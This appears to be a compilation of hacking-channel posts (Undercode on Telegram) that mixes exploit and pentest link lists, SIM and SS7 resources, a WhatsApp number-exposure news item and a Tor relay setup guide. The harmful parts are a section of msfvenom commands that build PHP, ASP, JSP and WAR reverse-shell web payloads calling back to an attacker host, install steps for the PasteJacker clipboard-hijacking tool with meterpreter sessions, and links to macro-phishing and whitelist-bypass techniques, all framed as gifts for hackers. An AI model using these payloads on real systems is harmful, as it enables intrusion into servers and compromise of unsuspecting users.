▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

#Exploit Development References

🦑Tutorials and Examples :

* [Shellcode Tutorial](http://www.vividmachines.com/shellcode/shellcode.html)

* [Shellcode Examples](http://shell-storm.org/shellcode/)

* [Exploit Writing Tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)

* [Exploit Exercises](https://exploit-exercises.com/)

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HACKERS GIFT :))

1️⃣#Reverse Enginnering Tools

- IDA Pro

- GDB

- Radare2

2️⃣#MQTT

- Introduction

- Hacking the IoT with MQTT

- thoughts about using IoT MQTT for V2V and Connected Car from CES 2014

- Nmap

- The Seven Best MQTT Client Tools

- A Guide to MQTT by Hacking a Doorbell to send Push Notifications

3️⃣#CoAP

- Introduction

- CoAP client Tools

- CoAP Pentest Tools

- Nmap

4️⃣#Automobile

- Introduction and protocol Overview

- PENTESTING VEHICLES WITH CANTOOLZ

- Building a Car Hacking Development Workbench: Part1

- CANToolz - Black-box CAN network analysis framework

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SIM CARD GSM SOFTWARES FREE :

> This is the source code for the pySimReader application.

> It requires a PCSC compatible SIM reader to be attached to the computer.


> The main product page is here: http://twhiteman.netfirms.com/pySIM.html

(You can download the Windows installer from here: https://github.com/toddw-as/SimReader/blob/master/installer/pySimReader_v14_setup.exe?raw=true )

> The application uses Python for the user interface and data processing, as well as a binary Python module (DLL) to utilize the Microsoft SmartCard Base Component APIs (note that if I were to rewrite this code today, I'd probably utilize Python ctypes instead of this wrapper library - as that would simplify the build process - removing the Microsoft Visual Studio and Swig dependencies).


#Requested
✅

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 #GSM & #SS7 Pentesting

- [Introduction to GSM Security](http://www.pentestingexperts.com/introduction-to-gsm-security/)

- [GSM Security 2](https://www.ehacking.net/2011/02/gsm-security-2.html)

- [vulnerabilities in GSM security with USRP B200](https://ieeexplore.ieee.org/document/7581461/)

- [Security Testing 4G (LTE) Networks](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-44con-lte-presentation-2012-09-11.pdf)

- [Case Study of SS7/SIGTRAN Assessment](https://nullcon.net/website/archives/pdf/goa-2017/case-study-of-SS7-sigtran.pdf)

- [Telecom Signaling Exploitation Framework - SS7, GTP, Diameter & SIP](https://github.com/SigPloiter/SigPloit)

- [ss7MAPer – A SS7 pen testing toolkit](https://n0where.net/ss7-pentesting-toolkit-ss7maper)

- [Introduction to SIGTRAN and SIGTRAN Licensing](https://www.youtube.com/watch?v=XUY6pyoRKsg)

- [SS7 Network Architecture](https://youtu.be/pg47dDUL1T0)

- [Introduction to SS7 Signaling](https://www.patton.com/whitepapers/Intro_to_SS7_Tutorial.pdf)

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WhatsApp vulnerability or exposed user's mobile number :

> A security researcher revealed that WhatsApp discovered a bug that allowed users' mobile numbers to be exposed on the Google search engine. Although not all users' numbers have been exposed, this issue has caused their concern. However, if the user has only talked to a WhatsApp user he knows (the group invitation link has not been used), there is a high probability that he will not be affected by this vulnerability.

> WhatsApp
WhatsApp vulnerability or exposed user's mobile number
Author: Content reprint Date: 2020-06-09 Category: Vulnerability event
Views 2550like 0score 12345
A security researcher revealed that WhatsApp discovered a bug that allowed users' mobile numbers to be exposed on the Google search engine. Although not all users' numbers have been exposed, this issue has caused their concern. However, if the user has only talked to a WhatsApp user he knows (the group invitation link has not been used), there is a high probability that he will not be affected by this vulnerability.


> Athul Jayaram, a security researcher, said that WhatsApp executives are aware of the problem, but are indifferent to it. It is reported that the issue is related to the WhatsApp QR code feature launched earlier this year.

> WhatsApp’s previously released group invite link works differently than the new QR code feature, but the former is obviously more secure-because the latter uses the unencrypted http://wa.me/ short URL system, The user's phone number is not hidden in the link.

> When a user shares a QR code on the new system, if the URL is crawled by a Google crawler, it will most likely be included in the search engine's index results. If you are worried about your number being accidentally received, please search and verify it via site:wa.me + country code.

> Currently, if searched through site:api.whatsapp.com, the Google search engine will also return thousands of search results. But unless the WhatsApp executives face the problem squarely, the negative impact of this matter will certainly continue.

@UndercodeNews
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Radio IoT Protocols Overview

- [Understanding Radio](https://www.taitradioacademy.com/lessons/introduction-to-radio-communications-principals/)

- [Signal Processing]()

- [Software Defined Radio](https://www.allaboutcircuits.com/technical-articles/introduction-to-software-defined-radio/)

- [Gnuradio](https://wiki.gnuradio.org/index.php/Guided_Tutorial_GRC#Tutorial:_GNU_Radio_Companion)

- [Creating a flow graph](https://blog.didierstevens.com/2017/09/19/quickpost-creating-a-simple-flow-graph-with-gnu-radio-companion/)

- [Analysing radio signals](https://www.rtl-sdr.com/analyzing-433-mhz-transmitters-rtl-sdr/)

- [Recording specific radio signal](https://www.rtl-sdr.com/freqwatch-rtl-sdr-frequency-scanner-recorder/)

- [Replay Attacks](https://www.rtl-sdr.com/tutorial-replay-attacks-with-an-rtl-sdr-raspberry-pi-and-rpitx/)


✅@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hacking systems with the automation of PasteJacking attacks :
> In short, Pastejacking is a method that malicious websites employ to take control of your computers’ clipboard and change its content to something harmful without your knowledge. From The Windows club definition

> So here what I did is automating the original attack and adding two other tricks to fool the user, using HTML and CSS Will talk about it then added meterpreter sessions as I said before.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/D4Vinci/PasteJacker.git

2️⃣sudo python3 -m pip install ./PasteJacker

3️⃣sudo pastejacker

🦑requirements :

1️⃣Python 3 and setuptools module.

2️⃣Linux or Unix-based system (Currently tested only on Kali Linux rolling and Ubuntu 16.04).

3️⃣Third-party requirements like msfvenom but only if you are gonna use the msfvenom option, of course.

4️⃣Third-party library ncurses-dev for Ubuntu
Root access.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Sandboxing/Reversing tools 2020 Used by Pro hackers :

[Cuckoo](https://github.com/cuckoobox) - O\pen Source Highly configurable sandboxing tool

Cuckoo-modified - Heavily modified Cuckoo fork developed by community

[Cuckoo-modified-api](https://github.com/keithjjones/cuckoo-modified-api) - A Python library to control a cuckoo-modified sandbox

Hybrid-Analysis - Hybrid-Analysis is a free powerful online sandbox by Payload Security

[Malwr](https://malwr.com) - Malwr is a free online malware analysis service and community, which is powered by the Cuckoo Sandbox

Mastiff - MASTIFF is a static analysis framework that automates the process of extracting key characteristics from a number of different file formats

[Metadefender Cloud](https://www.metadefender.com) - Metadefender is a free threat intelligence platform providing multiscanning, data sanitization and vulnerability assesment of files

Virustotal - Virustotal, a subsidiary of Google, is a free online service that analyzes files and URLs enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by antivirus engines and website scanners



> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑dump the memory contents of a process to a file without stopping the process :

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣ Download : https://vidstromlabs.com/downloads/pmdump.exe

2️⃣ Now you got a pmdump.exe file in downloads folder

3️⃣Open cmd go via dir ( cd)
In this case, your file path is C:\Program Files\Downloads\

4️⃣Type in cmd C:\Program Files\Downloads\ start pmdump.exe

( FOR DETAILS HOW TO RUN .EXE IN CMD WITH PICTURES GO TO
https://www.wikihow.com/Run-an-EXE-File-From-Command-Prompt )

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HOW CREATE & HOST DEEPWEBSITE By Undercode :

> Become a volunteer against Internet tracking: how to build Tor (Onion Network) nodes :

1️⃣Preparation

If you plan to build a non-exit relay (non-exit relay), that is, an entry node (guard relay) and a relay node (middle relay), then you need to prepare:

1) A server with at least 512MB of memory, basically still available PC can meet the requirements, it is recommended to use VPS or hosting;

2) Stable Internet access, at least 10Mbps network bandwidth, and a public IPv4 address that can be maintained for at least a few hours (recommended to use a fixed IP address). In addition, if the ISP provides an IPv6 address, don’t forget to add For it, Tor needs IPv6 nodes very much (currently, it does not support pure IPv6);
At least 2 hours of operation time per day, 24 hours operation is

🦑recommended;

1) Elementary system maintenance and usage skills of text editor (such as vi) .

2) If you plan to set up an egress node, the situation becomes more complicated, because the egress node needs to be responsible for the traffic from Tor users (the server will think that the egress node IP user is accessing itself). Due to Tor's high anonymity, there are so many pirated P2P downloads, network attacks, and spams initiated by Tor that you cannot completely prevent them from passing through your exit node. Therefore, there are some additional requirements for setting up exit nodes:

3) A server, VPS or cloud host dedicated to the exit node should not run other network services;

ISP must allow egress nodes to be set up ( click here to view the
attitude of various VPS and hosting providers to Tor ), generally data centers, universities, non-profit organizations, and never set up egress nodes in their own homes or companies;

4) A fixed public IPv4 address dedicated to the egress node, on which other network services should not be running (again, if the ISP provides an IPv6 address, don’t forget to add it during configuration);

5) (Optional) ISP can provide customized WHOIS and rDNS information to avoid some troubles;
Give some energy to deal with abuse letters , such as DMCA complaints, etc., otherwise the service may be shut down by the ISP or face legal issues.

6) Most Tor nodes are based on the Linux (mainly Debian) operating system, but Tor Project advocates diversity, so it is also welcome to use the BSD operating system to build Tor

2️⃣ Installation :

1) Debian is used as an example here For configuration methods under other operating systems, please refer to here .

2) Execute the following command in the terminal to install the Tor server (requires sudo or operate under the root user, the same below):

> apt update && apt install tor

3) Three, configuration
Tor's configuration file is named "torrc" and is located in /etc/tor.

> Use a text editor to open it:

> vi /etc/tor/torrc
It can be found that a lot of content has been commented out ("#" before the text) in the file, you can uncomment the required parameters to make them effective, or write the required parameters at the end of the file.

🦑A typical configuration file must have the following basic parameters:

Nickname name Undercode-Testing
ORPort 9001
ORPort [IPv6-address]:9001 \
ExitRelay 0
IPv6Exit 0
SocksPort 0
ControlSocket 0
ContactInfo name@domain
VPS or leased servers often have traffic restrictions. You can avoid premature exhaustion of traffic by controlling bandwidth and Tor running time:

1) AccountingMax N bytes|KBytes|MBytes|GBytes|TBytes|KBits|MBits|GBits|TBits
AccountingStart day|week|month [day] HH:MM

2) Please note that high-speed and time-limited nodes are more practical than nodes that have been running at low speeds. In addition, the Tor network will also automatically adjust the workload assigned to the nodes by wayfinding weights (to be mentioned later) to properly extend the working hours of the nodes.

3) If this is an exit node, it is recommended to configure the outbound rules , which determines which ports of the other hosts on the Internet that the exit node can access. Careful configuration of outbound rules can prevent nodes from being abused by hackers. For example, port 3389 is forbidden to prevent nodes from being used to perform remote desktop brute force cracking. Of course, if you want to minimize abuse letters, you can only open ports 80 and 443, and only provide the most basic web browsing service for Tor browser users.

4) The outbound rule configuration parameters are as follows (wildcards can be used for both address and port):

exitpolicy accept *:port
exitpolicy reject *:port
exitpolicy accept *:*
exitpolicy reject *:*
If you do not configure the outbound rules, but only turn on the exit node switch, Tor will use the following default rules:

reject 0.0.0.0/8:*
reject 169.254.0.0/16:*
reject 127.0.0.0/8:*
reject 192.168.0.0/16:*
reject 10.0.0.0/8:*
reject 172.16.0.0/12:*
reject self-ip:*
reject *:25
reject *:119
reject *:135-139
reject *:445
reject *:563
reject *:1214
reject *:4661-4666
reject *:6346-6429
reject *:6699
reject *:6881-6999
accept *:*

🦑After editing, save and exit the text editor, execute the following command to restart Tor:

systemctl restart tor@default

4️⃣ Inspection and maintenance :

1) After the node is set up, you can use the "netstat -an" command to check whether your node service listening port has established a TCP connection. In addition,

2) it is recommended to search for your own node by using the IP address or nickname as a keyword in Tor Metrics to check its operating status, where "Fingerprint" is the unique identity of the node, and "Consensus Weight" is the pathfinding weight of the node (and bandwidth (It depends on the duration of the operation. The larger the number, the easier it is to select).

3) If you want to better monitor the node's running status and system resource usage in real time, it is recommended to install nyx :

> apt-get install nyx

> pip install nyx

> After the installation is complete, add the following parameters to the torrc file:

> ControlPort 9051

> CookieAuthentication 1

3) After the configuration is complete, you can start nyx directly in the terminal (note the user rights), and press the q key twice to exit.


🦑WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Exploits & #Bugs New :


[Exploiting CVE-2017-0199: HTA Handler Vulnerability](https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/)

CVE-2017-0199 Toolkit


[Window Signed Binary](https://github.com/vysec/Windows-SignedBinary)

Wepwnise

[Bash Bunny](https://hakshop.com/products/bash-bunny)

Generate Macro - Tool

[How To: Empiresa Cross Platform Office Macro](https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/)

Excel macros with PowerShell

[PowerPoint and Custom Actions](https://phishme.com/powerpoint-and-custom-actions/)

MS Signed mimikatz in just 3 steps

[Hiding your process from sysinternals](https://riscybusiness.wordpress.com/2017/10/07/hiding-your-process-from-sysinternals/)

Luckystrike: An Evil Office Document Generator

[The Absurdly Underestimated Dangers of CSV Injection](http://georgemauer.net/2017/10/07/csv-injection.html)

Macro-less Code Exec in MSWord

[Multi-Platform Macro Phishing Payloads](https://medium.com/@malcomvetter/multi-platform-macro-phishing-payloads-3b688e8eff68)

Macroless DOC malware that avoids detection with Yara rule

[Empire without powershell](https://bneg.io/2017/07/26/empire-without-powershell-exe/)

Powershell without Powershell to bypass app whitelist/

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

SUPPORT & SHARE :

T.me/UndercodeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Web #Payloads Commands Metasploit



1️⃣msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php

2️⃣ Creates a Simple TCP Shell for PHP

3️⃣ msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp

4️⃣Creates a Simple TCP Shell for ASP

5️⃣msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp

6️⃣ Creates a Simple TCP Shell for Javascript

7️⃣ msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war`

8️⃣ Creates a Simple TCP Shell for WAR

>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Open Source #Threat Intelligence

- GOSINT - a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence.

- Awesome Threat Intelligence - A curated list of awesome Threat Intelligence resources. This is a great resource and I try to contribute to it.


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 IP address and DNS #Lookup Tools 2020 :

- bgp

- Bgpview

- DataSploit (IP Address Modules)

- Domain Dossier

- Domaintoipconverter

- Googleapps Dig

- Hurricane Electric BGP Toolkit

- ICANN Whois

- Massdns

- Mxtoolbox

- Ultratools ipv6Info

- Viewdns

- Umbrella (OpenDNS) Popularity List

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁